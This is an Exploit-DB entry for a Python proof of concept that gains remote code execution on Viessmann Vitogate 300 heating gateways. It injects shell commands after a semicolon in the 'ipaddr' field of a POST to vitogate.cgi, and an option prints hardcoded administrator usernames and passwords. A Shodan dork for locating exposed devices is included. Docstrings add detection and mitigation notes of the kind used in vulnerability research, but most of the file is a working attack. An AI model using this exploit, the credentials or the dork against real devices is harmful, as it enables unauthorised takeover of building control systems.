
[remote] Viessmann Vitogate 300 2.1.3.0 - Remote Code Execution (RCE)

 6 months ago
source link: https://www.exploit-db.com/exploits/51887

Viessmann Vitogate 300 2.1.3.0 - Remote Code Execution (RCE)


EDB Verified:



Platform:

Hardware

Date:

2024-03-14

Vulnerable App:

#- Exploit Title: Viessmann Vitogate 300 <= 2.1.3.0 - Remote Code Execution (RCE)
#- Shodan Dork: http.title:'Vitogate 300'
#- Exploit Author: ByteHunter
#- Email: [email protected]
#- Version: versions up to 2.1.3.0
#- Tested on: 2.1.1.0
#- CVE : CVE-2023-5702 & CVE-2023-5222


import argparse
import requests

def banner():
    """Print the script's identification banner to stdout.

    The text names the CVE the author attributes the issue to, the product
    and the author. Nothing is returned and no network activity happens here.
    """
    # Rows are spelled out one by one so the padding (including the trailing
    # spaces on some rows) is visible rather than hidden in a block literal.
    rows = [
        "",
        "    ╔═══════════════════════════════════╗",
        "             CVE-2023-5702   ",
        "           Vitogate 300 RCE",
        "           Author: ByteHunter      ",
        "    ╚═══════════════════════════════════╝",
        "    ",
    ]
    art = "\n".join(rows)

    print(art)


def send_post_request(target_ip, command, target_port):
    """Send one JSON POST to the Vitogate CGI endpoint and print the reply.

    The body is a ``put`` on form ``form-4-7`` whose ``ipaddr`` parameter is
    the literal ``1;`` followed by ``command``. The ``;`` separator implies
    that the device hands ``ipaddr`` to a shell without validating it as an
    address; that is the flaw this proof of concept demonstrates.

    NOTE(review): the banner labels this CVE-2023-5702, while the file header
    also lists CVE-2023-5222 without saying which identifier covers the
    injection and which the hardcoded accounts. Confirm against the
    advisories before citing either.

    For defenders, the request shape below is the detection surface: a POST
    to ``/cgi-bin/vitogate.cgi`` carrying ``form-4-7`` with an empty
    ``session`` and an ``ipaddr`` value that is not a plain IP address.
    The header states versions up to 2.1.3.0 are affected, so mitigation is
    a firmware update past that range and keeping the web interface off
    untrusted networks.

    Args:
        target_ip: Host placed in the URL and in the ``Host`` header.
        command: Text appended after ``1;`` in the ``ipaddr`` parameter.
        target_port: Port placed in the URL.

    Returns:
        None. The response body (HTTP 200) or the status code (anything
        else) is printed to stdout.
    """
    payload = {
        "method": "put",
        "form": "form-4-7",
        # Empty session value: the request carries no session token.
        "session": "",
        "params": {
            # An address field carrying a shell separator; a correct handler
            # would reject anything that does not parse as an IP address.
            "ipaddr": f"1;{command}"
        }
    }

    headers = {
        "Host": target_ip,
        # Length of the Python repr of the dict, not of the JSON body that
        # json= serialises below, so this value need not match the bytes
        # sent. NOTE(review): requests normally computes Content-Length
        # itself; confirm whether this header has any effect.
        "Content-Length": str(len(str(payload))),
        "Content-Type": "application/json"
    }

    # Plain HTTP: the request and the response travel unencrypted.
    url = f"http://{target_ip}:{target_port}/cgi-bin/vitogate.cgi"


    # No timeout is passed, so this call can block if the host never answers.
    response = requests.post(url, json=payload, headers=headers)

    if response.status_code == 200:
        print("Result:")
        print(response.text)
    else:
        print(f"Request failed! status code: {response.status_code}")

def main():
    """Parse the command line and run the selected mode.

    With ``--creds`` the script only prints the account strings embedded
    below and contacts nothing. Otherwise ``--target`` and ``--command`` must
    both be given (``--port`` defaults to the string ``"80"``) and a single
    request is issued through ``send_post_request``.
    """
    cli = argparse.ArgumentParser(description="Vitogate 300 RCE & Hardcoded Credentials")
    cli.add_argument("--target", required=False, help="Target IP address")
    cli.add_argument("--port", required=False, help="Target port", default="80")
    cli.add_argument("--command", required=False, help="Command")
    cli.add_argument("--creds", action="store_true", help="Show hardcoded credentials")

    opts = cli.parse_args()

    if opts.creds:
        # Static strings only; the script describes these as hardcoded
        # administrative accounts. If they are fixed in firmware, limiting
        # who can reach the management interface is the operator's control.
        for line in (
            "Vitogate 300 hardcoded administrative accounts credentials",
            "Username: vitomaster, Password: viessmann1917",
            "Username: vitogate, Password: viessmann",
        ):
            print(line)
        return

    # Every option is declared optional to argparse, so the pairing of
    # --target and --command is enforced here instead.
    if not opts.target or not opts.command:
        print("Both --target and --command options are required.\nor use --creds option to see hardcoded Credentials.")
        return

    send_post_request(opts.target, opts.command, opts.port)

# Script entry point: the banner is printed on every run, before the
# arguments are parsed, so it appears even when the options are incomplete.
if __name__ == "__main__":
    banner()
    main()
            
